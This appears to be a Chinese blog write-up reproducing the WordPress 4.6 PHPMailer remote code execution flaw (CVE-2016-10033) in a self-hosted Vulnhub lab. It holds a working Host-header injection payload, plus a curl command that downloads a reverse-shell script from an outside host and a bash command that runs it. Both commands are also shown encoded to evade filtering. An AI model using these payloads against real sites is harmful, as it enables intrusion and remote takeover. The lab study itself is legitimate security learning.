美文网首页
Vulnhub-Wordpress 4.6 Remote Cod

Vulnhub-Wordpress 4.6 Remote Cod

作者: M0nkeyK1ng | 来源:发表于2020-08-23 10:40 被阅读0次

郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。

漏洞简述

WordPress ≤ 4.7.1使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。

准备环境

测试机IP:192.168.79.129

靶机IP:192.168.79.131

1. 启动Vulnhub靶机环境:

2. 验证靶机应用启用成功:

3. 用wpscan扫描,能发现此漏洞

漏洞复现

方法一:手工利用

前提条件:

#执行的命令不能包含一些特殊的字符

#命令为小写字母

#命令使用绝对路径

#至少需要知道一个用户名

使用${substr{0}{1}{$spool_directory}}代替/

使用${substr{10}{1}{$tod_log}}代替‘空格’

POC:

参考:https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

HTTP Host标头:target(any -froot@localhost -be ${run{command}} null)

1. 使用Burp拦截找回密码页的访问,/wp-login.php?action=lostpassword

2.准备反弹Shell文件

3. 开启python http server,供靶机下载反弹Shell文件

4. 构建下载Shell文件命令

原命令:

/usr/bin/curl -o/tmp/shell 192.168.79.131/shell.sh

转换后命令:

${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}-o${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}192.168.79.131${substr{0}{1}{$spool_directory}}shell.sh

5. 构建执行Shell文件命令

原命令:

/bin/bash /tmp/shell

转换后命令:

${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell

6. 使用Burp执行下载Shell文件命令(这里将8080端口去调了,不然报500错误)

7. 使用NC侦听反弹端口

8. 使用Burp执行反弹Shell

9. 得到反弹Shell

方法二:使用现有的exp

引用:https://www.exploit-db.com/exploits/41962

1. 修改脚本

# 修改接收反弹shell的主机IP

2. 执行脚本,发现报错。因为脚本是针对windows环境的,需要将其转换成对应的linux格式。

3. 转换脚本格式

4. 再次执行

5. 命令使用格式: exploit.sh target-wordpress-url,尝试执行,又发现反弹dns解析失败。

6. 由于没有使用DNS解析域名,再次修改脚本

7. 继续执行脚本:bash exploit.sh http://192.168.79.131:8080/ ,成功接收到反弹Shell。

关闭环境

相关文章

网友评论

      本文标题:Vulnhub-Wordpress 4.6 Remote Cod

      本文链接:https://www.haomeiwen.com/subject/gftvjktx.html